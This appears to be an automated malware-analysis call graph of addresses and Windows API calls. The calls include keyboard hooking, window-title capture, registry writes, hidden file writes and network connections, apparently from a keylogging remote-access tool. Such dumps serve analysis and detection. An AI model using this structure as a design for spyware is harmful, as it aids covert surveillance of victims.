47680 445909 EnterCriticalSection 47668->47680 47688 44062d 20 API calls __dosmaperr 47669->47688 47672 45026b 47689 450292 LeaveCriticalSection std::_Lockit::~_Lockit 47672->47689 47673 45023f 47673->47672 47681 450154 47673->47681 47675 450221 ___BuildCatchObject ___std_exception_copy 47675->47651 47677->47656 47678->47652 47679->47655 47680->47673 47690 445b74 47681->47690 47683 450173 47698 446802 20 API calls __dosmaperr 47683->47698 47684 450166 47684->47683 47697 448b04 11 API calls 2 library calls 47684->47697 47686 4501c5 47686->47673 47688->47675 47689->47675 47695 445b81 __Getctype 47690->47695 47691 445bac RtlAllocateHeap 47693 445bbf 47691->47693 47691->47695 47692 445bc1 47700 44062d 20 API calls __dosmaperr 47692->47700 47693->47684 47695->47691 47695->47692 47699 443001 7 API calls 2 library calls 47695->47699 47697->47684 47698->47686 47699->47695 47700->47693 47701->47664 47703 434bb8 GetStartupInfoW 47702->47703 47703->47342 47705 44f0eb 47704->47705 47706 44f0e2 47704->47706 47705->47345 47709 44efd8 49 API calls 5 library calls 47706->47709 47708->47345 47709->47705 47711 41cc20 LoadLibraryA GetProcAddress 47710->47711 47712 41cc10 GetModuleHandleA GetProcAddress 47710->47712 47713 41cc49 44 API calls 47711->47713 47714 41cc39 LoadLibraryA GetProcAddress 47711->47714 47712->47711 47713->47350 47714->47713 48119 41b539 FindResourceA 47715->48119 47719 40f428 ctype 48129 4020b7 47719->48129 47722 401fe2 28 API calls 47723 40f44e 47722->47723 47724 401fd8 11 API calls 47723->47724 47725 40f457 47724->47725 47726 43bda0 new 21 API calls 47725->47726 47727 40f468 ctype 47726->47727 48135 406e13 47727->48135 47729 40f49b 47729->47352 47731 40210c 47730->47731 47732 4023ce 11 API calls 47731->47732 47733 402126 47732->47733 47734 402569 28 API calls 47733->47734 47735 402134 47734->47735 47735->47355 48189 4020df 47736->48189 47738 41bf2f 47739 401fd8 11 API calls 47738->47739 47740 41bf61 47739->47740 47741 401fd8 11 API calls 47740->47741 47743 41bf69 47741->47743 47742 41bf31 48195 4041a2 28 API calls 47742->48195 47746 401fd8 11 API calls 47743->47746 47749 40ea5f 47746->47749 47747 41bf3d 47750 401fe2 28 API calls 47747->47750 47748 401fe2 28 API calls 47757 41bebf 47748->47757 47758 40fb52 47749->47758 47751 41bf46 47750->47751 47752 401fd8 11 API calls 47751->47752 47754 41bf4e 47752->47754 47753 401fd8 11 API calls 47753->47757 48196 41cec5 28 API calls 47754->48196 47757->47738 47757->47742 47757->47748 47757->47753 48193 4041a2 28 API calls 47757->48193 48194 41cec5 28 API calls 47757->48194 47759 40fb5e 47758->47759 47761 40fb65 47758->47761 48197 402163 11 API calls 47759->48197 47761->47360 47763 402163 47762->47763 47767 40219f 47763->47767 48198 402730 11 API calls 47763->48198 47765 402184 48199 402712 11 API calls std::_Deallocate 47765->48199 47767->47362 47769 401e6d 47768->47769 47770 401e75 47769->47770 48200 402158 22 API calls 47769->48200 47770->47368 47774 4020df 11 API calls 47773->47774 47775 40532a 47774->47775 48201 4032a0 47775->48201 47777 405346 47777->47375 48205 4051ef 47778->48205 47780 406391 48209 402055 47780->48209 47783 401fe2 47784 401ff1 47783->47784 47791 402039 47783->47791 47785 4023ce 11 API calls 47784->47785 47786 401ffa 47785->47786 47787 40203c 47786->47787 47788 402015 47786->47788 47789 40267a 11 API calls 47787->47789 48241 403098 28 API calls 47788->48241 47789->47791 47792 401fd8 47791->47792 47793 4023ce 11 API calls 47792->47793 47794 401fe1 47793->47794 47794->47387 47796 401fd2 47795->47796 47797 401fc9 47795->47797 47796->47393 48242 4025e0 28 API calls 47797->48242 48243 401fab 47799->48243 47801 40d0ae CreateMutexA GetLastError 47801->47409 48244 41c048 47802->48244 47807 401fe2 28 API calls 47808 41b390 47807->47808 47809 401fd8 11 API calls 47808->47809 47810 41b398 47809->47810 47811 4135e1 31 API calls 47810->47811 47813 41b3ee 47810->47813 47812 41b3c1 47811->47812 47814 41b3cc StrToIntA 47812->47814 47813->47416 47815 41b3e3 47814->47815 47816 41b3da 47814->47816 47817 401fd8 11 API calls 47815->47817 48252 41cffa 22 API calls 47816->48252 47817->47813 47820 407765 47819->47820 47821 413584 3 API calls 47820->47821 47822 40776c 47821->47822 47822->47426 47822->47427 47824 41bd03 47823->47824 48253 40b93f 47824->48253 47826 41bd0b 47826->47444 47828 401f22 47827->47828 47835 401f6a 47827->47835 47829 402252 11 API calls 47828->47829 47830 401f2b 47829->47830 47831 401f6d 47830->47831 47832 401f46 47830->47832 48286 402336 47831->48286 48285 40305c 28 API calls 47832->48285 47836 401f09 47835->47836 47837 402252 11 API calls 47836->47837 47838 401f12 47837->47838 47838->47455 47840 4139a0 47839->47840 47841 406e13 28 API calls 47840->47841 47842 4139b5 47841->47842 47843 4020f6 28 API calls 47842->47843 47844 4139c5 47843->47844 47845 4137aa 14 API calls 47844->47845 47846 4139cf 47845->47846 47847 401fd8 11 API calls 47846->47847 47848 4139dc 47847->47848 47848->47505 47850 40209b 47849->47850 47851 4023ce 11 API calls 47850->47851 47852 4020a6 47851->47852 48290 4024ed 47852->48290 47856 4137fa 47855->47856 47858 4137c3 47855->47858 47857 401fd8 11 API calls 47856->47857 47859 40efd9 47857->47859 47860 4137d5 RegSetValueExA RegCloseKey 47858->47860 47859->47506 47860->47856 47862 43bb45 _strftime 47861->47862 48294 43ae83 47862->48294 47864 40eff2 47864->47513 47864->47514 47866 41b631 47865->47866 47867 41b596 GetLocalTime 47865->47867 47868 401fd8 11 API calls 47866->47868 47869 40531e 28 API calls 47867->47869 47870 41b639 47868->47870 47871 41b5d8 47869->47871 47872 401fd8 11 API calls 47870->47872 47873 406383 28 API calls 47871->47873 47874 40f048 47872->47874 47875 41b5e4 47873->47875 47874->47530 48322 402f10 47875->48322 47878 406383 28 API calls 47879 41b5fc 47878->47879 48327 40723b 77 API calls 47879->48327 47881 41b60a 47882 401fd8 11 API calls 47881->47882 47883 41b616 47882->47883 47884 401fd8 11 API calls 47883->47884 47885 41b61f 47884->47885 47886 401fd8 11 API calls 47885->47886 47887 41b628 47886->47887 47888 401fd8 11 API calls 47887->47888 47888->47866 47890 409e3d _wcslen 47889->47890 47891 409e48 47890->47891 47892 409e5f 47890->47892 47893 40da6f 31 API calls 47891->47893 47894 40da6f 31 API calls 47892->47894 47895 409e50 47893->47895 47896 409e67 47894->47896 47897 401f13 28 API calls 47895->47897 47898 401f13 28 API calls 47896->47898 47900 409e5a 47897->47900 47899 409e75 47898->47899 47901 401f09 11 API calls 47899->47901 47903 401f09 11 API calls 47900->47903 47902 409e7d 47901->47902 48346 409196 28 API calls 47902->48346 47905 409eb4 47903->47905 48331 40a144 47905->48331 47906 409e8f 48347 403014 47906->48347 47911 401f13 28 API calls 47912 409ea4 47911->47912 47913 401f09 11 API calls 47912->47913 47913->47900 48551 40417e 47914->48551 47919 403014 28 API calls 47920 41b703 47919->47920 47921 401f09 11 API calls 47920->47921 47922 41b70c 47921->47922 47923 401f09 11 API calls 47922->47923 47924 40f25e 47923->47924 47924->47583 47926 41355b RegQueryValueExA RegCloseKey 47925->47926 47927 40f31f 47925->47927 47926->47927 47927->47456 47927->47611 47929 413a7a RegDeleteValueW 47928->47929 47930 40f3cd 47928->47930 47929->47930 47930->47450 47932 40dd96 47931->47932 47933 41353a 3 API calls 47932->47933 47934 40dd9d 47933->47934 47935 40ddbc 47934->47935 48643 401707 47934->48643 47939 414f65 47935->47939 47937 40ddaa 48646 4138b2 RegCreateKeyA 47937->48646 47940 4020df 11 API calls 47939->47940 47941 414f79 47940->47941 48660 41b944 47941->48660 47944 4020df 11 API calls 47945 414f8f 47944->47945 47946 401e65 22 API calls 47945->47946 47947 414f9d 47946->47947 47948 43bb2c _strftime 40 API calls 47947->47948 47949 414faa 47948->47949 47950 414fbc 47949->47950 47951 414faf Sleep 47949->47951 47952 402093 28 API calls 47950->47952 47951->47950 47953 414fcb 47952->47953 47954 401e65 22 API calls 47953->47954 47955 414fd4 47954->47955 47956 4020f6 28 API calls 47955->47956 47957 414fdf 47956->47957 47958 41beac 28 API calls 47957->47958 47959 414fe7 47958->47959 48664 40489e WSAStartup 47959->48664 47961 414ff1 47962 401e65 22 API calls 47961->47962 47963 414ffa 47962->47963 47964 401e65 22 API calls 47963->47964 47989 415079 47963->47989 47965 415013 47964->47965 47967 401e65 22 API calls 47965->47967 47966 4020f6 28 API calls 47966->47989 47968 415024 47967->47968 47971 401e65 22 API calls 47968->47971 47969 41beac 28 API calls 47969->47989 47970 401e65 22 API calls 47970->47989 47972 415035 47971->47972 47974 401e65 22 API calls 47972->47974 47973 406c59 28 API calls 47973->47989 47975 415046 47974->47975 47976 401e65 22 API calls 47975->47976 47978 415057 47976->47978 47977 401fe2 28 API calls 47977->47989 47979 401e65 22 API calls 47978->47979 47980 415069 47979->47980 48829 40473d 89 API calls 47980->48829 47982 41b580 80 API calls 47982->47989 47984 4151c7 WSAGetLastError 48830 41cb72 30 API calls 47984->48830 47989->47966 47989->47969 47989->47970 47989->47973 47989->47977 47989->47982 47989->47984 47992 40531e 28 API calls 47989->47992 47993 401e8d 11 API calls 47989->47993 47994 402f10 28 API calls 47989->47994 47995 43bb2c _strftime 40 API calls 47989->47995 47996 406383 28 API calls 47989->47996 48000 409097 28 API calls 47989->48000 48001 441ed1 20 API calls 47989->48001 48002 413733 3 API calls 47989->48002 48003 4135e1 31 API calls 47989->48003 48004 40417e 28 API calls 47989->48004 48007 401e65 22 API calls 47989->48007 48011 41bc1f 28 API calls 47989->48011 48013 41bdaf 28 API calls 47989->48013 48016 402ea1 28 API calls 47989->48016 48018 401fd8 11 API calls 47989->48018 48019 401f09 11 API calls 47989->48019 48021 415a6e 47989->48021 48023 402093 28 API calls 47989->48023 48024 415aac CreateThread 47989->48024 48665 414f24 47989->48665 48670 40482d 47989->48670 48677 404f51 47989->48677 48692 4048c8 connect 47989->48692 48752 41b871 47989->48752 48755 4145f8 47989->48755 48758 40ddc4 47989->48758 48764 41bcd3 47989->48764 48767 41bb77 47989->48767 48769 41bb27 47989->48769 48774 40f90c GetLocaleInfoA 47989->48774 48777 402f31 47989->48777 48782 404aa1 47989->48782 48797 404c10 47989->48797 48816 404e26 WaitForSingleObject 47989->48816 48831 4052fd 28 API calls 47989->48831 47992->47989 47993->47989 47994->47989 47997 415b0a Sleep 47995->47997 47996->47989 47997->47989 48000->47989 48001->47989 48002->47989 48003->47989 48004->47989 48008 415474 GetTickCount 48007->48008 48009 41bc1f 28 API calls 48008->48009 48009->47989 48011->47989 48013->47989 48016->47989 48018->47989 48019->47989 48832 40b08c 85 API calls 48021->48832 48023->47989 48024->47989 48913 41ada8 105 API calls 48024->48913 48025->47367 48026->47376 48027->47380 48030 4020df 11 API calls 48029->48030 48031 406c65 48030->48031 48032 4032a0 28 API calls 48031->48032 48033 406c82 48032->48033 48033->47401 48035 40ebdf 48034->48035 48036 4135ae RegQueryValueExA RegCloseKey 48034->48036 48035->47398 48035->47415 48036->48035 48037->47406 48038->47434 48039->47426 48040->47418 48041->47433 48043 401f86 11 API calls 48042->48043 48044 40da8b 48043->48044 48045 40dae0 48044->48045 48046 40daab 48044->48046 48050 40daa1 48044->48050 48049 41c048 GetCurrentProcess 48045->48049 48914 41b645 29 API calls 48046->48914 48048 40dbd4 GetLongPathNameW 48052 40417e 28 API calls 48048->48052 48053 40dae5 48049->48053 48050->48048 48051 40dab4 48054 401f13 28 API calls 48051->48054 48055 40dbe9 48052->48055 48056 40dae9 48053->48056 48057 40db3b 48053->48057 48095 40dabe 48054->48095 48059 40417e 28 API calls 48055->48059 48058 40417e 28 API calls 48056->48058 48060 40417e 28 API calls 48057->48060 48062 40daf7 48058->48062 48063 40dbf8 48059->48063 48061 40db49 48060->48061 48068 40417e 28 API calls 48061->48068 48069 40417e 28 API calls 48062->48069 48917 40de0c 28 API calls 48063->48917 48064 401f09 11 API calls 48064->48050 48066 40dc0b 48918 402fa5 28 API calls 48066->48918 48071 40db5f 48068->48071 48072 40db0d 48069->48072 48070 40dc16 48919 402fa5 28 API calls 48070->48919 48916 402fa5 28 API calls 48071->48916 48915 402fa5 28 API calls 48072->48915 48076 40dc20 48079 401f09 11 API calls 48076->48079 48077 40db6a 48080 401f13 28 API calls 48077->48080 48078 40db18 48081 401f13 28 API calls 48078->48081 48082 40dc2a 48079->48082 48083 40db75 48080->48083 48084 40db23 48081->48084 48085 401f09 11 API calls 48082->48085 48086 401f09 11 API calls 48083->48086 48087 401f09 11 API calls 48084->48087 48088 40dc33 48085->48088 48089 40db7e 48086->48089 48090 40db2c 48087->48090 48091 401f09 11 API calls 48088->48091 48092 401f09 11 API calls 48089->48092 48093 401f09 11 API calls 48090->48093 48094 40dc3c 48091->48094 48092->48095 48093->48095 48096 401f09 11 API calls 48094->48096 48095->48064 48097 40dc45 48096->48097 48098 401f09 11 API calls 48097->48098 48099 40dc4e 48098->48099 48099->47492 48100->47503 48101->47526 48103 413759 RegQueryValueExA RegCloseKey 48102->48103 48104 41377d 48102->48104 48103->48104 48104->47485 48105->47518 48108 434563 48106->48108 48107 43bda0 new 21 API calls 48107->48108 48108->48107 48109 40f10c 48108->48109 48920 443001 7 API calls 2 library calls 48108->48920 48921 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48108->48921 48922 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48108->48922 48109->47556 48113->47587 48114->47575 48116->47620 48117->47425 48120 41b556 LoadResource LockResource SizeofResource 48119->48120 48121 40f419 48119->48121 48120->48121 48122 43bda0 48121->48122 48127 4461b8 __Getctype 48122->48127 48123 4461f6 48139 44062d 20 API calls __dosmaperr 48123->48139 48125 4461e1 RtlAllocateHeap 48126 4461f4 48125->48126 48125->48127 48126->47719 48127->48123 48127->48125 48138 443001 7 API calls 2 library calls 48127->48138 48130 4020bf 48129->48130 48140 4023ce 48130->48140 48132 4020ca 48144 40250a 48132->48144 48134 4020d9 48134->47722 48136 4020b7 28 API calls 48135->48136 48137 406e27 48136->48137 48137->47729 48138->48127 48139->48126 48141 402428 48140->48141 48142 4023d8 48140->48142 48141->48132 48142->48141 48151 4027a7 11 API calls std::_Deallocate 48142->48151 48145 40251a 48144->48145 48146 402520 48145->48146 48147 402535 48145->48147 48152 402569 48146->48152 48162 4028e8 48147->48162 48150 402533 48150->48134 48151->48141 48173 402888 48152->48173 48154 40257d 48155 402592 48154->48155 48156 4025a7 48154->48156 48178 402a34 22 API calls 48155->48178 48158 4028e8 28 API calls 48156->48158 48161 4025a5 48158->48161 48159 40259b 48179 4029da 22 API calls 48159->48179 48161->48150 48163 4028f1 48162->48163 48164 402953 48163->48164 48165 4028fb 48163->48165 48187 4028a4 22 API calls 48164->48187 48168 402904 48165->48168 48169 402917 48165->48169 48181 402cae 48168->48181 48170 402915 48169->48170 48172 4023ce 11 API calls 48169->48172 48170->48150 48172->48170 48174 402890 48173->48174 48175 402898 48174->48175 48180 402ca3 22 API calls 48174->48180 48175->48154 48178->48159 48179->48161 48182 402cb8 __EH_prolog 48181->48182 48188 402e54 22 API calls 48182->48188 48184 4023ce 11 API calls 48185 402d92 48184->48185 48185->48170 48186 402d24 48186->48184 48188->48186 48190 4020e7 48189->48190 48191 4023ce 11 API calls 48190->48191 48192 4020f2 48191->48192 48192->47757 48193->47757 48194->47757 48195->47747 48196->47738 48197->47761 48198->47765 48199->47767 48203 4032aa 48201->48203 48202 4032c9 48202->47777 48203->48202 48204 4028e8 28 API calls 48203->48204 48204->48202 48206 4051fb 48205->48206 48215 405274 48206->48215 48208 405208 48208->47780 48210 402061 48209->48210 48211 4023ce 11 API calls 48210->48211 48212 40207b 48211->48212 48237 40267a 48212->48237 48216 405282 48215->48216 48217 405288 48216->48217 48218 40529e 48216->48218 48226 4025f0 48217->48226 48220 4052f5 48218->48220 48221 4052b6 48218->48221 48235 4028a4 22 API calls 48220->48235 48224 4028e8 28 API calls 48221->48224 48225 40529c 48221->48225 48224->48225 48225->48208 48227 402888 22 API calls 48226->48227 48228 402602 48227->48228 48229 402672 48228->48229 48230 402629 48228->48230 48236 4028a4 22 API calls 48229->48236 48233 4028e8 28 API calls 48230->48233 48234 40263b 48230->48234 48233->48234 48234->48225 48238 40268b 48237->48238 48239 4023ce 11 API calls 48238->48239 48240 40208d 48239->48240 48240->47783 48241->47791 48242->47796 48245 41b362 48244->48245 48246 41c055 GetCurrentProcess 48244->48246 48247 4135e1 RegOpenKeyExA 48245->48247 48246->48245 48248 41360f RegQueryValueExA RegCloseKey 48247->48248 48249 413639 48247->48249 48248->48249 48250 402093 28 API calls 48249->48250 48251 41364e 48250->48251 48251->47807 48252->47815 48254 40b947 48253->48254 48259 402252 48254->48259 48256 40b952 48263 40b967 48256->48263 48258 40b961 48258->47826 48260 4022ac 48259->48260 48261 40225c 48259->48261 48260->48256 48261->48260 48270 402779 11 API calls std::_Deallocate 48261->48270 48264 40b9a1 48263->48264 48265 40b973 48263->48265 48282 4028a4 22 API calls 48264->48282 48271 4027e6 48265->48271 48269 40b97d 48269->48258 48270->48260 48272 4027ef 48271->48272 48273 402851 48272->48273 48274 4027f9 48272->48274 48284 4028a4 22 API calls 48273->48284 48277 402802 48274->48277 48279 402815 48274->48279 48283 402aea 28 API calls __EH_prolog 48277->48283 48280 402813 48279->48280 48281 402252 11 API calls 48279->48281 48280->48269 48281->48280 48283->48280 48285->47835 48287 402347 48286->48287 48288 402252 11 API calls 48287->48288 48289 4023c7 48288->48289 48289->47835 48291 4024f9 48290->48291 48292 40250a 28 API calls 48291->48292 48293 4020b1 48292->48293 48293->47496 48310 43ba8a 48294->48310 48296 43aed0 48316 43a837 36 API calls 2 library calls 48296->48316 48298 43ae95 48298->48296 48299 43aeaa 48298->48299 48309 43aeaf ___std_exception_copy 48298->48309 48315 44062d 20 API calls __dosmaperr 48299->48315 48302 43aedc 48303 43af0b 48302->48303 48317 43bacf 40 API calls __Toupper 48302->48317 48307 43af77 48303->48307 48318 43ba36 20 API calls 2 library calls 48303->48318 48305 43b03e _strftime 48305->48309 48320 44062d 20 API calls __dosmaperr 48305->48320 48319 43ba36 20 API calls 2 library calls 48307->48319 48309->47864 48311 43baa2 48310->48311 48312 43ba8f 48310->48312 48311->48298 48321 44062d 20 API calls __dosmaperr 48312->48321 48314 43ba94 ___std_exception_copy 48314->48298 48315->48309 48316->48302 48317->48302 48318->48307 48319->48305 48320->48309 48321->48314 48328 401fb0 48322->48328 48324 402f1e 48325 402055 11 API calls 48324->48325 48326 402f2d 48325->48326 48326->47878 48327->47881 48329 4025f0 28 API calls 48328->48329 48330 401fbd 48329->48330 48330->48324 48332 40a162 48331->48332 48333 413584 3 API calls 48332->48333 48334 40a169 48333->48334 48335 40a197 48334->48335 48336 40a17d 48334->48336 48352 409097 48335->48352 48338 40a182 48336->48338 48339 409ed6 48336->48339 48341 409097 28 API calls 48338->48341 48339->47549 48343 40a190 48341->48343 48380 40a268 29 API calls 48343->48380 48345 40a195 48345->48339 48346->47906 48528 403222 48347->48528 48349 403022 48532 403262 48349->48532 48353 4090ad 48352->48353 48354 402252 11 API calls 48353->48354 48355 4090c7 48354->48355 48381 404267 48355->48381 48357 4090d5 48358 40a1b4 48357->48358 48393 40b927 48358->48393 48361 40a205 48363 402093 28 API calls 48361->48363 48362 40a1dd 48364 402093 28 API calls 48362->48364 48365 40a210 48363->48365 48366 40a1e7 48364->48366 48367 402093 28 API calls 48365->48367 48368 41bcef 28 API calls 48366->48368 48369 40a21f 48367->48369 48370 40a1f5 48368->48370 48371 41b580 80 API calls 48369->48371 48397 40b19f 31 API calls new 48370->48397 48374 40a224 CreateThread 48371->48374 48373 40a1fc 48375 401fd8 11 API calls 48373->48375 48376 40a24b CreateThread 48374->48376 48377 40a23f CreateThread 48374->48377 48405 40a2b8 48374->48405 48375->48361 48378 401f09 11 API calls 48376->48378 48402 40a2c4 48376->48402 48377->48376 48399 40a2a2 48377->48399 48379 40a25f 48378->48379 48379->48339 48380->48345 48527 40a2ae 163 API calls 48380->48527 48382 402888 22 API calls 48381->48382 48383 40427b 48382->48383 48384 404290 48383->48384 48385 4042a5 48383->48385 48391 4042df 22 API calls 48384->48391 48386 4027e6 28 API calls 48385->48386 48390 4042a3 48386->48390 48388 404299 48392 402c48 22 API calls 48388->48392 48390->48357 48391->48388 48392->48390 48394 40b930 48393->48394 48395 40a1d2 48393->48395 48398 40b9a7 28 API calls 48394->48398 48395->48361 48395->48362 48397->48373 48398->48395 48408 40a2f3 48399->48408 48438 40ad11 48402->48438 48480 40a761 48405->48480 48409 40a30c GetModuleHandleA SetWindowsHookExA 48408->48409 48410 40a36e GetMessageA 48408->48410 48409->48410 48412 40a328 GetLastError 48409->48412 48411 40a380 TranslateMessage DispatchMessageA 48410->48411 48413 40a2ab 48410->48413 48411->48410 48411->48413 48423 41bc1f 48412->48423 48429 441ed1 48423->48429 48426 402093 28 API calls 48427 40a339 48426->48427 48428 4052fd 28 API calls 48427->48428 48430 441edd 48429->48430 48433 441ccd 48430->48433 48432 41bc43 48432->48426 48434 441ce4 48433->48434 48436 441d1b ___std_exception_copy 48434->48436 48437 44062d 20 API calls __dosmaperr 48434->48437 48436->48432 48437->48436 48466 40ad1f 48438->48466 48439 40a2cd 48440 40ad79 Sleep GetForegroundWindow GetWindowTextLengthW 48441 40b93f 28 API calls 48440->48441 48441->48466 48445 41bb77 GetTickCount 48445->48466 48447 40adbf GetWindowTextW 48447->48466 48449 40af17 48451 401f09 11 API calls 48449->48451 48450 40b927 28 API calls 48450->48466 48451->48439 48452 40ae84 Sleep 48452->48466 48453 441ed1 20 API calls 48453->48466 48455 402093 28 API calls 48455->48466 48456 40ae0c 48458 409097 28 API calls 48456->48458 48456->48466 48476 40b19f 31 API calls new 48456->48476 48458->48456 48460 406383 28 API calls 48460->48466 48462 403014 28 API calls 48462->48466 48463 41bcef 28 API calls 48463->48466 48464 40a671 12 API calls 48464->48466 48465 401f09 11 API calls 48465->48466 48466->48439 48466->48440 48466->48445 48466->48447 48466->48449 48466->48450 48466->48452 48466->48453 48466->48455 48466->48456 48466->48460 48466->48462 48466->48463 48466->48464 48466->48465 48467 401fd8 11 API calls 48466->48467 48468 43445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 48466->48468 48469 401f86 48466->48469 48473 434801 23 API calls __onexit 48466->48473 48474 43441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 48466->48474 48475 40907f 28 API calls 48466->48475 48477 40b9b7 28 API calls 48466->48477 48478 40b783 40 API calls 2 library calls 48466->48478 48479 4052fd 28 API calls 48466->48479 48467->48466 48470 401f8e 48469->48470 48471 402252 11 API calls 48470->48471 48472 401f99 48471->48472 48472->48466 48473->48466 48474->48466 48475->48466 48476->48456 48477->48466 48478->48466 48481 40a776 Sleep 48480->48481 48501 40a6b0 48481->48501 48483 40a2c1 48484 40a7c7 GetFileAttributesW 48488 40a788 48484->48488 48485 40a7b6 CreateDirectoryW 48485->48488 48486 40a7de SetFileAttributesW 48486->48488 48488->48481 48488->48483 48488->48484 48488->48485 48488->48486 48490 401e65 22 API calls 48488->48490 48492 40a829 48488->48492 48514 41c482 48488->48514 48489 40a858 PathFileExistsW 48489->48492 48490->48488 48491 4020df 11 API calls 48491->48492 48492->48489 48492->48491 48494 4020b7 28 API calls 48492->48494 48495 40a961 SetFileAttributesW 48492->48495 48496 401fd8 11 API calls 48492->48496 48497 401fe2 28 API calls 48492->48497 48498 406e13 28 API calls 48492->48498 48500 401fd8 11 API calls 48492->48500 48524 41c516 32 API calls 48492->48524 48525 41c583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48492->48525 48494->48492 48495->48488 48496->48492 48497->48492 48498->48492 48500->48488 48502 40a75d 48501->48502 48504 40a6c6 48501->48504 48502->48488 48503 40a6e5 CreateFileW 48503->48504 48505 40a6f3 GetFileSize 48503->48505 48504->48503 48506 40a728 CloseHandle 48504->48506 48507 40a73a 48504->48507 48508 40a716 48504->48508 48509 40a71d Sleep 48504->48509 48505->48504 48505->48506 48506->48504 48507->48502 48511 409097 28 API calls 48507->48511 48526 40b117 84 API calls 48508->48526 48509->48506 48512 40a756 48511->48512 48513 40a1b4 124 API calls 48512->48513 48513->48502 48515 41c495 CreateFileW 48514->48515 48517 41c4d2 48515->48517 48518 41c4ce 48515->48518 48519 41c4f2 WriteFile 48517->48519 48520 41c4d9 SetFilePointer 48517->48520 48518->48488 48522 41c505 48519->48522 48523 41c507 CloseHandle 48519->48523 48520->48519 48521 41c4e9 CloseHandle 48520->48521 48521->48518 48522->48523 48523->48518 48524->48492 48525->48492 48526->48509 48529 40322e 48528->48529 48538 403618 48529->48538 48531 40323b 48531->48349 48533 40326e 48532->48533 48534 402252 11 API calls 48533->48534 48535 403288 48534->48535 48536 402336 11 API calls 48535->48536 48537 403031 48536->48537 48537->47911 48539 403626 48538->48539 48540 403644 48539->48540 48541 40362c 48539->48541 48543 40365c 48540->48543 48544 40369e 48540->48544 48549 4036a6 28 API calls 48541->48549 48547 4027e6 28 API calls 48543->48547 48548 403642 48543->48548 48550 4028a4 22 API calls 48544->48550 48547->48548 48548->48531 48549->48548 48552 404186 48551->48552 48553 402252 11 API calls 48552->48553 48554 404191 48553->48554 48562 4041bc 48554->48562 48557 4042fc 48573 404353 48557->48573 48559 40430a 48560 403262 11 API calls 48559->48560 48561 404319 48560->48561 48561->47919 48563 4041c8 48562->48563 48566 4041d9 48563->48566 48565 40419c 48565->48557 48567 4041e9 48566->48567 48568 404206 48567->48568 48569 4041ef 48567->48569 48570 4027e6 28 API calls 48568->48570 48571 404267 28 API calls 48569->48571 48572 404204 48570->48572 48571->48572 48572->48565 48574 40435f 48573->48574 48577 404371 48574->48577 48576 40436d 48576->48559 48578 40437f 48577->48578 48579 404385 48578->48579 48580 40439e 48578->48580 48641 4034e6 28 API calls 48579->48641 48581 402888 22 API calls 48580->48581 48582 4043a6 48581->48582 48584 404419 48582->48584 48585 4043bf 48582->48585 48642 4028a4 22 API calls 48584->48642 48588 4027e6 28 API calls 48585->48588 48596 40439c 48585->48596 48588->48596 48596->48576 48641->48596 48649 43ab1a 48643->48649 48647 4138f4 48646->48647 48648 4138ca RegSetValueExA RegCloseKey 48646->48648 48647->47935 48648->48647 48652 43aa9b 48649->48652 48651 40170d 48651->47937 48653 43aaaa 48652->48653 48654 43aabe 48652->48654 48658 44062d 20 API calls __dosmaperr 48653->48658 48657 43aaaf __alldvrm ___std_exception_copy 48654->48657 48659 4489d7 11 API calls 2 library calls 48654->48659 48657->48651 48658->48657 48659->48657 48661 41b98a ctype ___scrt_fastfail 48660->48661 48662 402093 28 API calls 48661->48662 48663 414f84 48662->48663 48663->47944 48664->47961 48666 414f33 48665->48666 48667 414f3d getaddrinfo WSASetLastError 48665->48667 48833 414dc1 29 API calls ___std_exception_copy 48666->48833 48667->47989 48669 414f38 48669->48667 48671 404846 socket 48670->48671 48672 404839 48670->48672 48673 404860 CreateEventW 48671->48673 48674 404842 48671->48674 48834 40489e WSAStartup 48672->48834 48673->47989 48674->47989 48676 40483e 48676->48671 48676->48674 48678 404f65 48677->48678 48679 404fea 48677->48679 48680 404f6e 48678->48680 48681 404fc0 CreateEventA CreateThread 48678->48681 48682 404f7d GetLocalTime 48678->48682 48679->47989 48680->48681 48681->48679 48836 405150 48681->48836 48683 41bc1f 28 API calls 48682->48683 48684 404f91 48683->48684 48835 4052fd 28 API calls 48684->48835 48693 404a1b 48692->48693 48694 4048ee 48692->48694 48695 40497e 48693->48695 48696 404a21 WSAGetLastError 48693->48696 48694->48695 48697 404923 48694->48697 48699 40531e 28 API calls 48694->48699 48695->47989 48696->48695 48698 404a31 48696->48698 48840 420cf1 27 API calls 48697->48840 48700 404932 48698->48700 48701 404a36 48698->48701 48703 40490f 48699->48703 48706 402093 28 API calls 48700->48706 48845 41cb72 30 API calls 48701->48845 48707 402093 28 API calls 48703->48707 48705 40492b 48705->48700 48709 404941 48705->48709 48710 404a80 48706->48710 48711 40491e 48707->48711 48708 404a40 48846 4052fd 28 API calls 48708->48846 48716 404950 48709->48716 48717 404987 48709->48717 48713 402093 28 API calls 48710->48713 48714 41b580 80 API calls 48711->48714 48718 404a8f 48713->48718 48714->48697 48720 402093 28 API calls 48716->48720 48842 421ad1 54 API calls 48717->48842 48721 41b580 80 API calls 48718->48721 48724 40495f 48720->48724 48721->48695 48727 402093 28 API calls 48724->48727 48725 40498f 48728 4049c4 48725->48728 48729 404994 48725->48729 48731 40496e 48727->48731 48844 420e97 28 API calls 48728->48844 48733 402093 28 API calls 48729->48733 48736 41b580 80 API calls 48731->48736 48735 4049a3 48733->48735 48738 402093 28 API calls 48735->48738 48739 404973 48736->48739 48737 4049cc 48740 4049f9 CreateEventW CreateEventW 48737->48740 48742 402093 28 API calls 48737->48742 48741 4049b2 48738->48741 48841 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48739->48841 48740->48695 48743 41b580 80 API calls 48741->48743 48745 4049e2 48742->48745 48746 4049b7 48743->48746 48747 402093 28 API calls 48745->48747 48843 421143 52 API calls 48746->48843 48749 4049f1 48747->48749 48750 41b580 80 API calls 48749->48750 48751 4049f6 48750->48751 48751->48740 48847 41b847 GlobalMemoryStatusEx 48752->48847 48754 41b886 48754->47989 48848 4145bb 48755->48848 48759 40dde0 48758->48759 48760 41353a 3 API calls 48759->48760 48762 40dde7 48760->48762 48761 40ddff 48761->47989 48762->48761 48763 413584 3 API calls 48762->48763 48763->48761 48765 4020b7 28 API calls 48764->48765 48766 41bce8 48765->48766 48766->47989 48768 41bb8d GetTickCount 48767->48768 48768->47989 48770 436f10 ___scrt_fastfail 48769->48770 48771 41bb46 